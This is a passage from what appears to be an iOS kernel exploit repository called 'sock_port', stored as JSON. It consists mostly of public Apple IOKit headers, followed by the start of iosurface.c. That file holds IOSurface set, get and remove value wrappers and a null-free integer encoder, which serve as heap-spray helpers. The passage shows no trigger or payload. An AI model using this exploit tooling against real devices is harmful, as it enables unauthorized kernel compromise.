*/\n\nkern_return_t\nIOServiceOFPathToBSDName(mach_port_t\t\tmasterPort,\n const io_name_t\topenFirmwarePath,\n io_name_t\t\tbsdName);\n\t\t\t\t\t\t \n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @typedef IOAsyncCallback0\n @abstract standard callback function for asynchronous I/O requests with\n no extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n*/\ntypedef void (*IOAsyncCallback0)(void *refcon, IOReturn result);\n\n/*! @typedef IOAsyncCallback1\n @abstract standard callback function for asynchronous I/O requests with\n one extra argument beyond a refcon and result code.\n This is often a count of the number of bytes transferred\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param arg0\tExtra argument\n*/\ntypedef void (*IOAsyncCallback1)(void *refcon, IOReturn result, void *arg0);\n\n/*! @typedef IOAsyncCallback2\n @abstract standard callback function for asynchronous I/O requests with\n two extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param arg0\tExtra argument\n @param arg1\tExtra argument\n*/\ntypedef void (*IOAsyncCallback2)(void *refcon, IOReturn result, void *arg0, void *arg1);\n\n/*! @typedef IOAsyncCallback\n @abstract standard callback function for asynchronous I/O requests with\n lots of extra arguments beyond a refcon and result code.\n @param refcon The refcon passed into the original I/O request\n @param result The result of the I/O operation\n @param args\tArray of extra arguments\n @param numArgs Number of extra arguments\n*/\ntypedef void (*IOAsyncCallback)(void *refcon, IOReturn result, void **args,\n uint32_t numArgs);\n\n\n/* Internal use */\n\nkern_return_t\nOSGetNotificationFromMessage(\n\tmach_msg_header_t * msg,\n\tuint32_t\t \tindex,\n uint32_t \t * type,\n uintptr_t\t * reference,\n\tvoid\t\t ** content,\n vm_size_t\t * size );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/* Internal use */\n\nkern_return_t\nIOCatalogueSendData(\n mach_port_t masterPort,\n uint32_t flag,\n const char *buffer,\n uint32_t size );\n\nkern_return_t\nIOCatalogueTerminate(\n mach_port_t\t\tmasterPort,\n uint32_t flag,\n\tio_name_t\t\tdescription );\n\nkern_return_t\nIOCatalogueGetData(\n mach_port_t masterPort,\n uint32_t flag,\n char **buffer,\n uint32_t *size );\n\nkern_return_t\nIOCatalogueModuleLoaded(\n mach_port_t masterPort,\n io_name_t name );\n\nkern_return_t\nIOCatalogueReset(\n mach_port_t masterPort,\n uint32_t flag );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n// obsolete API\n\n#if !defined(__LP64__)\n\n// for Power Mgt\n\ntypedef struct IOObject IOObject;\n\n// for MacOS.app\n\nkern_return_t\nIORegistryDisposeEnumerator(\n\tio_enumerator_t\tenumerator ) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nIOMapMemory(\n\tio_connect_t\tconnect,\n\tuint32_t\tmemoryType,\n\ttask_port_t\tintoTask,\n\tvm_address_t *\tatAddress,\n\tvm_size_t *\tofSize,\n\tuint32_t\tflags ) DEPRECATED_ATTRIBUTE;\n\n// for CGS\n\nkern_return_t\nIOCompatibiltyNumber(\n\tmach_port_t\tconnect,\n\tuint32_t *\tobjectNumber ) DEPRECATED_ATTRIBUTE;\n\n// Traditional IOUserClient transport routines\nkern_return_t\nIOConnectMethodScalarIScalarO( \n\tio_connect_t\tconnect,\n uint32_t\tindex,\n IOItemCount\tscalarInputCount,\n IOItemCount\tscalarOutputCount,\n ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodScalarIStructureO(\n\tio_connect_t\tconnect,\n uint32_t\tindex,\n IOItemCount\tscalarInputCount,\n IOByteCount *\tstructureSize,\n ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodScalarIStructureI(\n\tio_connect_t\tconnect,\n uint32_t\tindex,\n IOItemCount\tscalarInputCount,\n IOByteCount\tstructureSize,\n ... ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\nkern_return_t\nIOConnectMethodStructureIStructureO(\n\tio_connect_t\tconnect,\n uint32_t\tindex,\n IOItemCount\tstructureInputSize,\n IOByteCount *\tstructureOutputSize,\n void *\t\tinputStructure,\n void *\t\touputStructure ) AVAILABLE_MAC_OS_X_VERSION_10_0_AND_LATER_BUT_DEPRECATED_IN_MAC_OS_X_VERSION_10_5;\n\n// Compatability with earlier Mig interface routines\n#if IOCONNECT_NO_32B_METHODS\n\nkern_return_t\nio_connect_map_memory(\n\tio_connect_t\t\tconnect,\n\tuint32_t\t\tmemoryType,\n\ttask_port_t\t\tintoTask,\n\tvm_address_t\t\t*atAddress,\n\tvm_size_t\t\t*ofSize,\n\tIOOptionBits\t\toptions) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_unmap_memory(\n\tio_connect_t\t\tconnect,\n\tuint32_t\t\tmemoryType,\n\ttask_port_t\t\tfromTask,\n\tvm_address_t\t\tatAddress) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_scalarO(\n\tmach_port_t connection,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_scalar_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_structureO(\n\tmach_port_t connection,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_scalarI_structureI(\n\tmach_port_t connection,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t inputStruct,\n\tmach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_connect_method_structureI_structureO(\n\tmach_port_t connection,\n\tint selector,\n\tio_struct_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_scalarO(\n\tmach_port_t connection,\n\tmach_port_t wake_port,\n\tio_async_ref_t reference,\n\tmach_msg_type_number_t referenceCnt,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_scalar_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_structureO(\n\tmach_port_t connection,\n\tmach_port_t wake_port,\n\tio_async_ref_t reference,\n\tmach_msg_type_number_t referenceCnt,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_scalarI_structureI(\n\tmach_port_t connection,\n\tmach_port_t wake_port,\n\tio_async_ref_t reference,\n\tmach_msg_type_number_t referenceCnt,\n\tint selector,\n\tio_scalar_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t inputStruct,\n\tmach_msg_type_number_t inputStructCnt) DEPRECATED_ATTRIBUTE;\n\nkern_return_t\nio_async_method_structureI_structureO(\n\tmach_port_t connection,\n\tmach_port_t wake_port,\n\tio_async_ref_t reference,\n\tmach_msg_type_number_t referenceCnt,\n\tint selector,\n\tio_struct_inband_t input,\n\tmach_msg_type_number_t inputCnt,\n\tio_struct_inband_t output,\n\tmach_msg_type_number_t *outputCnt) DEPRECATED_ATTRIBUTE;\n#endif // IOCONNECT_NO_32B_METHODS\n\n#endif /* defined(__LP64__) */\n\n__END_DECLS\n\n#endif /* ! _IOKIT_IOKITLIB_H */\n" }, { "path": "Exploits/sock_port/include/IOKit/IOReturn.h", "content": "/*\n * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n * \n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n/*\n * HISTORY\n */\n \n/*\n * Core IOReturn values. Others may be family defined.\n */\n\n#ifndef __IOKIT_IORETURN_H\n#define __IOKIT_IORETURN_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#include \n\ntypedef\tkern_return_t\t\tIOReturn;\n\n#ifndef sys_iokit\n#define sys_iokit err_system(0x38)\n#endif /* sys_iokit */\n#define sub_iokit_common err_sub(0)\n#define sub_iokit_usb err_sub(1)\n#define sub_iokit_firewire err_sub(2)\n#define sub_iokit_block_storage err_sub(4)\n#define sub_iokit_graphics err_sub(5)\n#define sub_iokit_networking\t\t err_sub(6)\n#define sub_iokit_bluetooth err_sub(8)\n#define sub_iokit_pmu err_sub(9)\n#define sub_iokit_acpi err_sub(10)\n#define sub_iokit_smbus err_sub(11)\n#define sub_iokit_ahci err_sub(12)\n#define sub_iokit_powermanagement err_sub(13)\n//#define sub_iokit_hidsystem err_sub(14)\n#define sub_iokit_scsi err_sub(16)\n//#define sub_iokit_pccard err_sub(21)\n\n#define sub_iokit_vendor_specific err_sub(-2)\n#define sub_iokit_reserved err_sub(-1)\n\n#define\tiokit_common_err(return) (sys_iokit|sub_iokit_common|return)\n#define\tiokit_family_err(sub,return) (sys_iokit|sub|return)\n#define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return)\n\n#define kIOReturnSuccess KERN_SUCCESS // OK\n#define kIOReturnError iokit_common_err(0x2bc) // general error \t\n#define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory \n#define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage \n#define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC \n#define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device \n#define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation \n#define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument \n#define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked \n#define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked \n#define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and\n // device already open \n#define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages\n // had different msg_id\n#define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function \n#define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure \n#define kIOReturnInternalError iokit_common_err(0x2c9) // internal error \n#define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error \n//#define kIOReturn???Error iokit_common_err(0x2cb) // ??? \n#define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock\n#define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open \n#define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported \n#define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported \n#define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error \n#define kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error \n#define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open \n#define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure \n#define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure \n#define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy \n#define kIOReturnTimeout iokit_common_err(0x2d6) // I/O Timeout \n#define kIOReturnOffline iokit_common_err(0x2d7) // device offline \n#define kIOReturnNotReady iokit_common_err(0x2d8) // not ready \n#define kIOReturnNotAttached iokit_common_err(0x2d9) // device not attached \n#define kIOReturnNoChannels iokit_common_err(0x2da) // no DMA channels left\n#define kIOReturnNoSpace iokit_common_err(0x2db) // no space for data \n//#define kIOReturn???Error iokit_common_err(0x2dc) // ??? \n#define kIOReturnPortExists iokit_common_err(0x2dd) // port already exists\n#define kIOReturnCannotWire iokit_common_err(0x2de) // can't wire down \n // physical memory\n#define kIOReturnNoInterrupt iokit_common_err(0x2df) // no interrupt attached\n#define kIOReturnNoFrames iokit_common_err(0x2e0) // no DMA frames enqueued\n#define kIOReturnMessageTooLarge iokit_common_err(0x2e1) // oversized msg received\n // on interrupt port\n#define kIOReturnNotPermitted iokit_common_err(0x2e2) // not permitted\n#define kIOReturnNoPower iokit_common_err(0x2e3) // no power to device\n#define kIOReturnNoMedia iokit_common_err(0x2e4) // media not present\n#define kIOReturnUnformattedMedia iokit_common_err(0x2e5)// media not formatted\n#define kIOReturnUnsupportedMode iokit_common_err(0x2e6) // no such mode\n#define kIOReturnUnderrun iokit_common_err(0x2e7) // data underrun\n#define kIOReturnOverrun iokit_common_err(0x2e8) // data overrun\n#define kIOReturnDeviceError\t iokit_common_err(0x2e9) // the device is not working properly!\n#define kIOReturnNoCompletion\t iokit_common_err(0x2ea) // a completion routine is required\n#define kIOReturnAborted\t iokit_common_err(0x2eb) // operation aborted\n#define kIOReturnNoBandwidth\t iokit_common_err(0x2ec) // bus bandwidth would be exceeded\n#define kIOReturnNotResponding\t iokit_common_err(0x2ed) // device not responding\n#define kIOReturnIsoTooOld\t iokit_common_err(0x2ee) // isochronous I/O request for distant past!\n#define kIOReturnIsoTooNew\t iokit_common_err(0x2ef) // isochronous I/O request for distant future\n#define kIOReturnNotFound iokit_common_err(0x2f0) // data was not found\n#define kIOReturnInvalid iokit_common_err(0x1) // should never be seen\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IORETURN_H */\n" }, { "path": "Exploits/sock_port/include/IOKit/IOTypes.h", "content": "/*\n * Copyright (c) 1998-2006 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. The rights granted to you under the License\n * may not be used to create, or enable the creation or redistribution of,\n * unlawful or unlicensed copies of an Apple operating system, or to\n * circumvent, violate, or enable the circumvention or violation of, any\n * terms of an Apple operating system software license agreement.\n * \n * Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_OSREFERENCE_LICENSE_HEADER_END@\n */\n#ifndef\t__IOKIT_IOTYPES_H\n#define __IOKIT_IOTYPES_H\n\n#ifndef IOKIT\n#define IOKIT 1\n#endif /* !IOKIT */\n\n#if KERNEL\n#include \n#else\n#include \n#include \n#endif\n\n#include \"IOReturn.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#ifndef\tNULL\n#if defined (__cplusplus)\n#define\tNULL\t0\n#else\n#define NULL ((void *)0)\n#endif\n#endif\n\t\n/*\n * Simple data types.\n */\n#ifndef __MACTYPES__\t/* CF MacTypes.h */\n#ifndef __TYPES__\t/* guess... Mac Types.h */\n\n#include \n#include \n\n#endif /* __TYPES__ */\n#endif /* __MACTYPES__ */\n\n#if KERNEL\n#include \n#endif\n\ntypedef UInt32\t\tIOOptionBits;\ntypedef SInt32\t\tIOFixed;\ntypedef UInt32\t\tIOVersion;\ntypedef UInt32\t\tIOItemCount;\ntypedef UInt32 \tIOCacheMode;\n\ntypedef UInt32\t \tIOByteCount32;\ntypedef UInt64\t \tIOByteCount64;\n\ntypedef UInt32\tIOPhysicalAddress32;\ntypedef UInt64\tIOPhysicalAddress64;\ntypedef UInt32\tIOPhysicalLength32;\ntypedef UInt64\tIOPhysicalLength64;\n\n#ifdef __LP64__\ntypedef mach_vm_address_t\tIOVirtualAddress;\n#else\ntypedef vm_address_t\t\tIOVirtualAddress;\n#endif\n\n#if defined(__LP64__) && defined(KERNEL)\ntypedef IOByteCount64\t\tIOByteCount;\n#else\ntypedef IOByteCount32\t \tIOByteCount;\n#endif\n\ntypedef IOVirtualAddress IOLogicalAddress;\n\n#if defined(__LP64__) && defined(KERNEL)\n\ntypedef IOPhysicalAddress64\t IOPhysicalAddress;\ntypedef IOPhysicalLength64\t IOPhysicalLength;\n#define IOPhysical32( hi, lo )\t\t((UInt64) lo + ((UInt64)(hi) << 32))\n#define IOPhysSize\t64\n\n#else\n\ntypedef IOPhysicalAddress32\t IOPhysicalAddress;\ntypedef IOPhysicalLength32\t IOPhysicalLength;\n#define IOPhysical32( hi, lo )\t\t(lo)\n#define IOPhysSize\t32\n\n#endif\n\n\ntypedef struct\n{\n IOPhysicalAddress\taddress;\n IOByteCount\t\tlength;\n} IOPhysicalRange;\n\ntypedef struct \n{\n IOVirtualAddress\taddress;\n IOByteCount\t\tlength;\n} IOVirtualRange;\n\n#ifdef __LP64__\ntypedef IOVirtualRange\tIOAddressRange;\n#else /* !__LP64__ */\ntypedef struct \n{\n mach_vm_address_t\taddress;\n mach_vm_size_t\tlength;\n} IOAddressRange;\n#endif /* !__LP64__ */\n\n/*\n * Map between #defined or enum'd constants and text description.\n */\ntypedef struct {\n\tint value;\n\tconst char *name;\n} IONamedValue;\n\n\n/*\n * Memory alignment -- specified as a power of two.\n */\ntypedef unsigned int\tIOAlignment;\n\n#define IO_NULL_VM_TASK\t\t((vm_task_t)0)\n\n\n/*\n * Pull in machine specific stuff.\n */\n\n//#include \n\n#ifndef MACH_KERNEL\n\n#ifndef __IOKIT_PORTS_DEFINED__\n#define __IOKIT_PORTS_DEFINED__\n#ifdef KERNEL\ntypedef struct OSObject * io_object_t;\n#else /* KERNEL */\ntypedef mach_port_t\tio_object_t;\n#endif /* KERNEL */\n#endif /* __IOKIT_PORTS_DEFINED__ */\n\n#include \n\ntypedef io_object_t\tio_connect_t;\ntypedef io_object_t\tio_enumerator_t;\ntypedef io_object_t\tio_iterator_t;\ntypedef io_object_t\tio_registry_entry_t;\ntypedef io_object_t\tio_service_t;\n\n#define\tIO_OBJECT_NULL\t((io_object_t) 0)\n\n#endif /* MACH_KERNEL */\n\n// IOConnectMapMemory memoryTypes\nenum {\n kIODefaultMemoryType\t= 0\n};\n\nenum {\n kIODefaultCache\t\t= 0,\n kIOInhibitCache\t\t= 1,\n kIOWriteThruCache\t\t= 2,\n kIOCopybackCache\t\t= 3,\n kIOWriteCombineCache\t= 4\n};\n\n// IOMemory mapping options\nenum {\n kIOMapAnywhere\t\t= 0x00000001,\n\n kIOMapCacheMask\t\t= 0x00000700,\n kIOMapCacheShift\t\t= 8,\n kIOMapDefaultCache\t\t= kIODefaultCache << kIOMapCacheShift,\n kIOMapInhibitCache\t\t= kIOInhibitCache << kIOMapCacheShift,\n kIOMapWriteThruCache\t= kIOWriteThruCache << kIOMapCacheShift,\n kIOMapCopybackCache\t\t= kIOCopybackCache << kIOMapCacheShift,\n kIOMapWriteCombineCache\t= kIOWriteCombineCache << kIOMapCacheShift,\n\n kIOMapUserOptionsMask\t= 0x00000fff,\n\n kIOMapReadOnly\t\t= 0x00001000,\n\n kIOMapStatic\t\t= 0x01000000,\n kIOMapReference\t\t= 0x02000000,\n kIOMapUnique\t\t= 0x04000000\n#ifdef XNU_KERNEL_PRIVATE\n , kIOMap64Bit\t\t= 0x08000000\n#endif\n};\n\n/*! @enum Scale Factors\n @discussion Used when a scale_factor parameter is required to define a unit of time.\n @constant kNanosecondScale Scale factor for nanosecond based times.\n @constant kMicrosecondScale Scale factor for microsecond based times.\n @constant kMillisecondScale Scale factor for millisecond based times.\n @constant kTickScale Scale factor for the standard (100Hz) tick.\n @constant kSecondScale Scale factor for second based times. */\n\nenum {\n kNanosecondScale = 1,\n kMicrosecondScale = 1000,\n kMillisecondScale = 1000 * 1000,\n kSecondScale = 1000 * 1000 * 1000,\n kTickScale = (kSecondScale / 100)\n};\n\n/* compatibility types */\n\n#ifndef KERNEL\n\ntypedef unsigned int IODeviceNumber;\n\n#endif\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* ! __IOKIT_IOTYPES_H */\n" }, { "path": "Exploits/sock_port/include/IOKit/OSMessageNotification.h", "content": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n * \n * This file contains Original Code and/or Modifications of Original Code\n * as defined in and that are subject to the Apple Public Source License\n * Version 2.0 (the 'License'). You may not use this file except in\n * compliance with the License. Please obtain a copy of the License at\n * http://www.opensource.apple.com/apsl/ and read it before using this\n * file.\n * \n * The Original Code and all software distributed under the License are\n * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER\n * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,\n * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n * Please see the License for the specific language governing rights and\n * limitations under the License.\n * \n * @APPLE_LICENSE_HEADER_END@\n */\n/*\n * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. \n *\n * HISTORY\n *\n */\n\n#ifndef\t__OS_OSMESSAGENOTIFICATION_H\n#define __OS_OSMESSAGENOTIFICATION_H\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#include \n#include \"IOReturn.h\"\n\nenum {\n kFirstIOKitNotificationType \t\t= 100,\n kIOServicePublishNotificationType \t\t= 100,\n kIOServiceMatchedNotificationType\t\t= 101,\n kIOServiceTerminatedNotificationType\t= 102,\n kIOAsyncCompletionNotificationType\t\t= 150,\n kIOServiceMessageNotificationType\t\t= 160,\n kLastIOKitNotificationType \t\t\t= 199\n};\n\nenum {\n kOSNotificationMessageID\t\t= 53,\n kOSAsyncCompleteMessageID\t\t= 57,\n kMaxAsyncArgs\t\t\t= 16\n};\n\nenum {\n kIOAsyncReservedIndex \t= 0,\n kIOAsyncReservedCount,\n\n kIOAsyncCalloutFuncIndex \t= kIOAsyncReservedCount,\n kIOAsyncCalloutRefconIndex,\n kIOAsyncCalloutCount,\n\n kIOMatchingCalloutFuncIndex\t= kIOAsyncReservedCount,\n kIOMatchingCalloutRefconIndex,\n kIOMatchingCalloutCount,\n \n kIOInterestCalloutFuncIndex\t= kIOAsyncReservedCount,\n kIOInterestCalloutRefconIndex,\n kIOInterestCalloutServiceIndex,\n kIOInterestCalloutCount\n};\n\nenum {\n kOSAsyncRefCount\t= 8,\n kOSAsyncRefSize \t= 32\n};\ntypedef natural_t OSAsyncReference[kOSAsyncRefCount];\n\nstruct OSNotificationHeader {\n vm_size_t\t\tsize;\t\t/* content size */\n natural_t\t\ttype;\n OSAsyncReference\treference;\n\n#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)\n unsigned char\tcontent[];\n#else\n unsigned char\tcontent[0];\n#endif\n};\n\nstruct IOServiceInterestContent {\n natural_t\tmessageType;\n void *\tmessageArgument[1];\n};\n\nstruct IOAsyncCompletionContent {\n IOReturn result;\n#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)\n void * args[];\n#else\n void * args[0];\n#endif\n};\n\n#ifndef __cplusplus\ntypedef struct OSNotificationHeader OSNotificationHeader;\ntypedef struct IOServiceInterestContent IOServiceInterestContent;\ntypedef struct IOAsyncCompletionContent IOAsyncCompletionContent;\n#endif\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* __OS_OSMESSAGENOTIFICATION_H */\n\n" }, { "path": "Exploits/sock_port/iosurface.c", "content": "/*\n * iosurface.c\n * Brandon Azad\n */\n#define IOSURFACE_EXTERN\n#include \"iosurface.h\"\n\n// ---- Global variables --------------------------------------------------------------------------\n\n// Is the IOSurface subsystem initialized?\nstatic bool IOSurface_initialized;\n\n// ---- Functions ---------------------------------------------------------------------------------\n\n#define ERROR(str, ...) printf(\"IOSurface: \"str, ##__VA_ARGS__)\nbool\nIOSurface_init() {\n\tif (IOSurface_initialized) {\n\t\treturn true;\n\t}\n\tIOSurfaceRoot = IOServiceGetMatchingService(\n\t\t\tkIOMasterPortDefault,\n\t\t\tIOServiceMatching(\"IOSurfaceRoot\"));\n\tif (IOSurfaceRoot == MACH_PORT_NULL) {\n\t\tERROR(\"IOSurface: Could not find %s\", \"IOSurfaceRoot\");\n\t\treturn false;\n\t}\n\tkern_return_t kr = IOServiceOpen(\n\t\t\tIOSurfaceRoot,\n\t\t\tmach_task_self(),\n\t\t\t0,\n\t\t\t&IOSurfaceRootUserClient);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: could not open %s\", \"IOSurfaceRootUserClient\");\n\t\treturn false;\n\t}\n\tstruct _IOSurfaceFastCreateArgs create_args = { .alloc_size = 0x4000, };\n\tstruct IOSurfaceLockResult lock_result;\n \n extern uint32_t create_outsize;\n\tsize_t lock_result_size = create_outsize;\n\tkr = IOConnectCallMethod(\n\t\t\tIOSurfaceRootUserClient,\n\t\t\t6, // create_surface_client_fast_path\n\t\t\tNULL, 0,\n\t\t\t&create_args, sizeof(create_args),\n\t\t\tNULL, NULL,\n\t\t\t&lock_result, &lock_result_size);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: could not create %s: 0x%x\", \"IOSurfaceClient\", kr);\n\t\treturn false;\n\t}\n\tIOSurface_id = lock_result.surface_id;\n if (!IOSurface_id) {\n IOSurface_id = (uint32_t)lock_result.addr3;\n }\n\tIOSurface_initialized = true;\n\treturn true;\n}\n\nvoid\nIOSurface_deinit() {\n\tassert(IOSurface_initialized);\n\tIOSurface_initialized = false;\n\tIOSurface_id = 0;\n\tIOServiceClose(IOSurfaceRootUserClient);\n\tIOObjectRelease(IOSurfaceRoot);\n}\n\n/*\n * IOSurface_set_value\n *\n * Description:\n * \tA wrapper around IOSurfaceRootUserClient::set_value().\n */\nbool\nIOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size) {\n\tstruct IOSurfaceValueResultArgs result;\n\tsize_t result_size = sizeof(result);\n\tkern_return_t kr = IOConnectCallMethod(\n\t\t\tIOSurfaceRootUserClient,\n\t\t\t9, // set_value\n\t\t\tNULL, 0,\n\t\t\targs, args_size,\n\t\t\tNULL, NULL,\n\t\t\t&result, &result_size);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: failed to %s value in %s: 0x%x\", \"set\", \"IOSurface\", kr);\n\t\treturn false;\n\t}\n\treturn true;\n}\n\n/*\n * IOSurface_get_value\n *\n * Description:\n * \tA wrapper around IOSurfaceRootUserClient::get_value().\n */\nstatic bool\nIOSurface_get_value(const struct IOSurfaceValueArgs *in, size_t in_size,\n\t\tstruct IOSurfaceValueArgs *out, size_t *out_size) {\n\tkern_return_t kr = IOConnectCallMethod(\n\t\t\tIOSurfaceRootUserClient,\n\t\t\t10, // get_value\n\t\t\tNULL, 0,\n\t\t\tin, in_size,\n\t\t\tNULL, NULL,\n\t\t\tout, out_size);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: failed to %s value in %s: 0x%x\", \"get\", \"IOSurface\", kr);\n\t\treturn false;\n\t}\n\treturn true;\n}\n\n/*\n * IOSurface_remove_value\n *\n * Description:\n * \tA wrapper around IOSurfaceRootUserClient::remove_value().\n */\nstatic bool\nIOSurface_remove_value(const struct IOSurfaceValueArgs *args, size_t args_size) {\n\tstruct IOSurfaceValueResultArgs result;\n\tsize_t result_size = sizeof(result);\n\tkern_return_t kr = IOConnectCallMethod(\n\t\t\tIOSurfaceRootUserClient,\n\t\t\t11, // remove_value\n\t\t\tNULL, 0,\n\t\t\targs, args_size,\n\t\t\tNULL, NULL,\n\t\t\t&result, &result_size);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"IOSurface: failed to %s value in %s: 0x%x\", \"remove\", \"IOSurface\", kr);\n\t\treturn false;\n\t}\n\treturn true;\n}\n\n/*\n * base255_encode\n *\n * Description:\n * \tEncode an integer so that it does not contain any null bytes.\n */\nstatic uint32_t\nbase255_encode(uint32_t value) {\n\tuint32_t encoded = 0;\n\tfor (unsigned i = 0; i < sizeof(value); i++) {\n\t\tencoded |= ((value % 255) + 1) << (8 * i);\n\t\tvalue /= 255;\n\t}\n\treturn 